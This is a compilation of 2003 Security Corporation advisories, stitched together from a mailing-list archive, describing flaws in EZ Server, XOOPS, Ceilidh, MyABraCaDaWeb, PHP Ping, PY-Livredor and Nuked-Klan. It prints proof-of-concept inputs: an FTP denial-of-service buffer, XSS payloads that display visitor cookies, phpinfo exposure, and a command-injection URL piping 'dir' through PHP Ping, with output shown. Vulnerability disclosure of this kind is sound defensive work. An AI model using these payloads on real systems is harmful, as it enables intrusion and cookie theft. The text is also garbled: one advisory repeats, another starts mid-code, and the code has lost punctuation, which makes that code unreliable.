[SCSA-014] Remote Denial of Service Vulnerability in EZ Server
== Security Corporation Security Advisory [SCSA-014] Remote Denial of Service Vulnerability in EZ Server == PROGRAM: EZ Server HOMEPAGE: http://www.html-helper.com VULNERABLE VERSIONS: 1.0 and prior ? RISK: Medium/High IMPACT: Denial Of Service RELEASE DATE: 2003-03-31 == TABLE OF CONTENTS == 1..DESCRIPTION 2..DETAILS 3..EXPLOIT 4SOLUTIONS 5VENDOR STATUS 6..CREDITS 7...DISCLAIMER 8...REFERENCES 9.FEEDBACK 1. DESCRIPTION == EZ Server is a compact multi-threaded server has both HTTP and FTP built right into it. (direct quote from http://www.html-helper.com) 2. DETAILS == ¤ Remote DoS : A security vulnerability in EZ FTP server allows remote attackers to cause the server to crash by executing a specific command (ls and cd command) with a buffer of 1994 or 1995 bytes in length or more. The command can be issued to the FTP server either by a valid authenticated user or by the anonymous account (if this is enabled). 3. EXPLOIT == The following is an example of what should be done to accomplish the Denial of Service attack: - With the ls command : C:\ftp target Connected to target. 220 EZ FTP Server ready. User (target:(none)): anonymous 331 Password required for anonymous. Password: 230 User anonymous logged in. ftp ls AAA AAA - With the cd command : C:\ftp target Connected to target. 220 EZ FTP Server ready. User (target:(none)): anonymous 331 Password required for anonymous. Password: 230 User anonymous logged in. ftp cd AAA
Re: [SCSA-011] Path Disclosure Vulnerability in XOOPS
In-Reply-To: [EMAIL PROTECTED] You can fix the path disclosure problem by adding this code in all the affected files : ---snip--- error_reporting(0); ---snip--- Greetz : Magistrat (http://www.blocus-zone.com) From: Grégory Le Bras [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: [SCSA-011] Path Disclosure Vulnerability in XOOPS Security Corporation Security Advisory [SCSA-011] PROGRAM: XOOPS HOMEPAGE: http://www.xoops.org/ VULNERABLE VERSIONS: v2.0 (and prior ?) DESCRIPTION XOOPS is a dynamic OO (Object Oriented) based open source portal script written in PHP. XOOPS is the ideal tool for developing small to large dynamic community websites,intra company portals, corporate portals, weblogs and much more. (direct quote from XOOPS website) DETAILS EXPLOITS ¤ Details Path Disclosure : A vulnerability have been found in XOOPS which allow attackers to determine the physical path of the application. This vulnerability would allow a remote user to determine the full path to the web root directory and other potentially sensitive information. This vulnerability can be triggered by a remote user submitting a specially crafted HTTP request including invalid input to the $xoopsOption variable. ¤ Exploits Path Disclosure : http://[target]/index.php?xoopsOption=any_word Affected files: admin.php edituser.php footer.php header.php image.php lostpass.php pmlite.php readpmsg.php register.php search.php user.php userinfo.php viewpmsg.php class/xoopsblock.php modules/contact/index.php modules/mydownloads/index.php modules/mydownloads/brokenfile.php modules/mydownloads/modfile.php modules/mydownloads/ratefile.php modules/mydownloads/singlefile.php modules/mydownloads/submit.php modules/mydownloads/topten.php modules/mydownloads/viewcat.php modules/mylinks/brokenlink.php modules/mylinks/index.php modules/mylinks/modlink.php modules/mylinks/ratelink.php modules/mylinks/singlelink.php modules/mylinks/submit.php modules/mylinks/topten.php modules/mylinks/viewcat.php modules/newbb/index.php modules/newbb/search.php modules/newbb/viewforum.php modules/newbb/viewtopic.php modules/news/archive.php modules/news/article.php modules/news/index.php modules/sections/index.php modules/system/admin.php modules/xoopsfaq/index.php modules/xoopsheadlines/index.php modules/xoopsmembers/index.php modules/xoopspartners/index.php modules/xoopspartners/join.php modules/xoopspoll/index.php modules/xoopspoll/pollresults.php SOLUTIONS No solution for the moment. VENDOR STATUS The vendor has reportedly been notified. LINKS Version Française : http://www.security-corporation.com/index.php?id=advisoriesa=011-FR Grégory Le Bras aka GaLiaRePt | http://www.Security-Corporation.com
[SCSA-013] Cross Site Scripting vulnerability in testcgi.exe
Security Corporation Security Advisory [SCSA-013] PROGRAM: Ceilidh HOMEPAGE: http://www.lilikoi.com VULNERABLE VERSIONS: 2.70 and prior DESCRIPTION Ceilidh is a Web-based threaded discussion engine that features automatic text to HTML conversion, file attachment, e-mail notification, automatic message expiration, multiple levels of security and much more. (direct quote from http://www.lilikoi.com) DETAILS EXPLOITS ¤ Cross Site Scripting : A exploitable bug was found on Ceilidh which cause script execution on client's computer by following a crafted url. This kind of attack known as Cross-Site Scripting Vulnerability is present in testcgi.exe file, an attacker can input specially crafted links and/or other malicious scripts. - Exploits : http://[target]/cgi-bin/testcgi.exe?[hostile_code] The hostile code could be : [script]alert(Cookie=+document.cookie)[/script] (open a window with the cookie of the visitor.) (replace [] by ) SOLUTIONS No solution for the moment. VENDOR STATUS The vendor has reportedly been notified. LINKS - http://www.security-corp.org/index.php?ink=4-15-1 - Version Française : http://www.security-corporation.com/index.php?id=advisoriesa=013-FR Grégory Le Bras aka GaLiaRePt | http://www.Security-Corporation.com
[SCSA-011] Path Disclosure Vulnerability in XOOPS
Security Corporation Security Advisory [SCSA-011] PROGRAM: XOOPS HOMEPAGE: http://www.xoops.org/ VULNERABLE VERSIONS: v2.0 (and prior ?) DESCRIPTION XOOPS is a dynamic OO (Object Oriented) based open source portal script written in PHP. XOOPS is the ideal tool for developing small to large dynamic community websites,intra company portals, corporate portals, weblogs and much more. (direct quote from XOOPS website) DETAILS EXPLOITS ¤ Details Path Disclosure : A vulnerability have been found in XOOPS which allow attackers to determine the physical path of the application. This vulnerability would allow a remote user to determine the full path to the web root directory and other potentially sensitive information. This vulnerability can be triggered by a remote user submitting a specially crafted HTTP request including invalid input to the $xoopsOption variable. ¤ Exploits Path Disclosure : http://[target]/index.php?xoopsOption=any_word Affected files: admin.php edituser.php footer.php header.php image.php lostpass.php pmlite.php readpmsg.php register.php search.php user.php userinfo.php viewpmsg.php class/xoopsblock.php modules/contact/index.php modules/mydownloads/index.php modules/mydownloads/brokenfile.php modules/mydownloads/modfile.php modules/mydownloads/ratefile.php modules/mydownloads/singlefile.php modules/mydownloads/submit.php modules/mydownloads/topten.php modules/mydownloads/viewcat.php modules/mylinks/brokenlink.php modules/mylinks/index.php modules/mylinks/modlink.php modules/mylinks/ratelink.php modules/mylinks/singlelink.php modules/mylinks/submit.php modules/mylinks/topten.php modules/mylinks/viewcat.php modules/newbb/index.php modules/newbb/search.php modules/newbb/viewforum.php modules/newbb/viewtopic.php modules/news/archive.php modules/news/article.php modules/news/index.php modules/sections/index.php modules/system/admin.php modules/xoopsfaq/index.php modules/xoopsheadlines/index.php modules/xoopsmembers/index.php modules/xoopspartners/index.php modules/xoopspartners/join.php modules/xoopspoll/index.php modules/xoopspoll/pollresults.php SOLUTIONS No solution for the moment. VENDOR STATUS The vendor has reportedly been notified. LINKS Version Française : http://www.security-corporation.com/index.php?id=advisoriesa=011-FR Grégory Le Bras aka GaLiaRePt | http://www.Security-Corporation.com
[SCSA-010] Path Disclosure Cross Site Scripting Vulnerability in MyABraCaDaWeb
,!document.cookie!,$ma_kw);
$ma_kw = eregi_replace(vbscript,!vbscript!,$ma_kw);
$ma_kw = eregi_replace(location,!location!,$ma_kw);
$ma_kw = eregi_replace(object,!object!,$ma_kw);
$ma_kw = eregi_replace(vbs,!vbs!,$ma_kw);
$ma_kw = eregi_replace(href,!href!,$ma_kw);
$vtp_p = new VTemplate;
$tpl_p = $vtp_p-Open(modules/pertinance/tpl/rapport.tpl);
$vtp_p-addSession($tpl_p,rapport);
$vtp_p-setVar($tpl_p,rapport.ma_kw,$ma_kw);
$vtp_p-setVar($tpl_p,rapport.NbMotCle,$NbMotCle);
$vtp_p-setVar($tpl_p,rapport.T3,$T3);
$vtp_p-setVar($tpl_p,rapport.NbLiens,$NbLiens);
if(quel_groupe() == 4){
$sql = htmlentities($sql);
$sql = addslashes($sql);
$vtp_p-addSession($tpl_p,sql);
$vtp_p-setVar($tpl_p,sql.sql,$sql);
$vtp_p-closeSession($tpl_p,sql);
}
$vtp_p-closeSession($tpl_p,rapport);
$Raport = $vtp_p-Display($tpl_p,0);
VENDOR STATUS
The vendor has reportedly been notified. It currently develops a patch.
LINKS
http://www.security-corporation.com/index.php?id=advisoriesa=010
http://www.security-corp.org/index.php?ink=4-15-1
-
Grégory Le Bras aka GaLiaRePt | http://www.Security-Corporation.com
-
[SCSA-009] Remote Command Execution Vulnerability in PHP Ping
Security Corporation Security Advisory [SCSA-009]
PROGRAM: PHP Ping
HOMEPAGE: http://www.phpapps.org/
VULNERABLE VERSIONS: v0.1 and prior
DESCRIPTION
PHP ping will allow you, provided that your server turns under Windows,
to realize a ping on the host of your choice.
(direct quote from PHP Ping website)
DETAILS
A vulnerability have been found in PHP ping which allow attackers to
execute remote command.
This vulnerability would allow a remote attacker to compromise parts of
the operating system, possibly the complete operating system.
Vulnerable code :
?
//*
// FONCTION DU PING
//*
function PHPing($cible,$pingFile){
exec(ping -a -n 1 $cible $pingFile, $list);
$fd = fopen($pingFile, r);
while(!feof($fd))
{
$ping.= fgets($fd,256);
}
fclose($fd);
return $ping;
}
//-
?
EXPLOIT
The vulnerability was discovered in the page for execute ping,
at this adress :
http://[target]/phpping/index.php?pingto=www.security-corp.org%20|%20dir
This exploit simply show the contents of the current repertory.
c:\phpping
03/03/2003 23:01 DIR .
03/03/2003 23:01 DIR ..
03/03/2003 23:00 DIR img
30/04/2002 23:133217 index.php
30/04/2002 23:19 921 README
03/03/2003 23:030 resultat.ping
3 file(s)4138 bytes
3 Dir(s) 11413962752 bytes free
SOLUTIONS
For example use this code :
?
//*
// FONCTION DU PING
//*
function PHPing($cible,$pingFile){
# BugFix by Gregory LEBRAS www.security-corp.org
if( (!$cible) ||
(!preg_match(/^[\w\d\.\-]+\.[\w\d]{1,3}$/i,$cible)) ){
echo(Error: Please specify a valid target host or IP.);
exit;
}
else
{
exec(ping -a -n 1 $cible $pingFile, $list);
$fd = fopen($pingFile, r);
while(!feof($fd))
{
$ping.= fgets($fd,256);
}
fclose($fd);
return $ping;
}
}
//
VENDOR STATUS
The vendor has reportedly been notified.
LINKS
Version Française :
http://www.security-corp.org/advisories/SCSA-009-FR.txt
Grégory Le Bras aka GaLiaRePt | http://www.Security-Corp.org
[SCSA-008] Cross Site Scripting Script Injection Vulnerability in PY-Livredor
Security Corporation Security Advisory [SCSA-008] PROGRAM: PY-Livredor HOMEPAGE: http://www.py-scripts.com http://www.scripts-php.com VULNERABLE VERSIONS: v1.0 DESCRIPTION PY-Livredor is an easy guestbook script using Php4 and MySql with an administration which allow messages deletion. DETAILS A Cross-Site Scripting vulnerability have been found in PY-Livredor which allow attackers to inject script codes into the guestbook and use them on clients browser as if they were provided by the website. This Cross-Site Scripting vulnerability are found in the page for posting messages (index.php) An attacker can input specially crafted links and/or other malicious scripts. EXPLOIT A vulnerability was discovered in the page for posting messages, at this adress : http://[target]/livredor/index.php The vulnerability is at the level of the interpretation of the titre, Votre pseudo, Votre e-mail, Votre message fields. Indeed, the insertion of a hostile code script in this field makes it possible to a malicious user to carry out this script on the navigator of the visitors. The hostile code could be : [script]alert(Cookie=+document.cookie)[/script] (open a window with the cookie of the visitor.) (replace [] by ) SOLUTIONS No solution for the moment. VENDOR STATUS The vendor has reportedly been notified. LINKS http://www.security-corp.org/index.php?ink=4-15-1 Version Française : http://www.security-corp.org/advisories/SCSA-008-FR.txt Grégory Le Bras aka GaLiaRePt | http://www.Security-Corp.org
[SCSA-006] XSS Function Execution Vulnerabilities in Nuked-Klan
Security Corporation Security Advisory [SCSA-006]
PROGRAM: Nuked-Klan
HOMEPAGE: http://www.nuked-klan.org
VULNERABLE VERSIONS: beta 1.3
DESCRIPTION
Nuked Klan is a PHP Gateway for clans.
(direct quote from Nuked Klan website)
DETAILS EXPLOITS
Many Cross-Site Scripting vulnerabilities have been found in Nuked Klan
which allow attackers to inject script codes into the page and use them
on clients browser as if they were provided by the site.
These Cross-Site Scripting vulnerabilities are found in the following
modules : Team, News, Links(Liens).
An attacker can input specially crafted links and/or other
malicious scripts.
Moreover this vulnerability allows an attacker to reach certain
functions of php.
Team
A vulnerability was discovered at this adress :
XSS:
http://[target]/index.php?file=Teamop=lt;scriptgt;alert('Test');lt;/scriptgt;
Function Execution:
---
http://[target]/index.php?file=Teamop=phpinfo
(display phpinfo(); - Outputs lots of PHP information)
News
A vulnerability was discovered at this adress :
XSS:
http://[target]/index.php?file=Newsop=lt;scriptgt;alert('test');lt;/scriptgt;
Function Execution:
---
http://[target]/index.php?file=Newsop=phpinfo
(display phpinfo(); - Outputs lots of PHP information)
Links
A vulnerability was discovered at this adress :
XSS:
http://[target]/index.php?file=Liensop=lt;scriptgt;alert('test');lt;/scriptgt;
Function Execution:
---
http://[target]/index.php?file=Liensop=phpinfo
(display phpinfo(); - Outputs lots of PHP information)
SOLUTIONS
No solutions for the moment.
VENDOR STATUS
The vendor has reportedly been notified. It currently develops a patch.
LINKS
http://www.security-corp.org/index.php?ink=4-15-1
Version Française :
http://www.security-corp.org/advisories/SCSA-006-FR.txt
Grégory Le Bras aka GaLiaRePt | http://www.Security-Corp.org
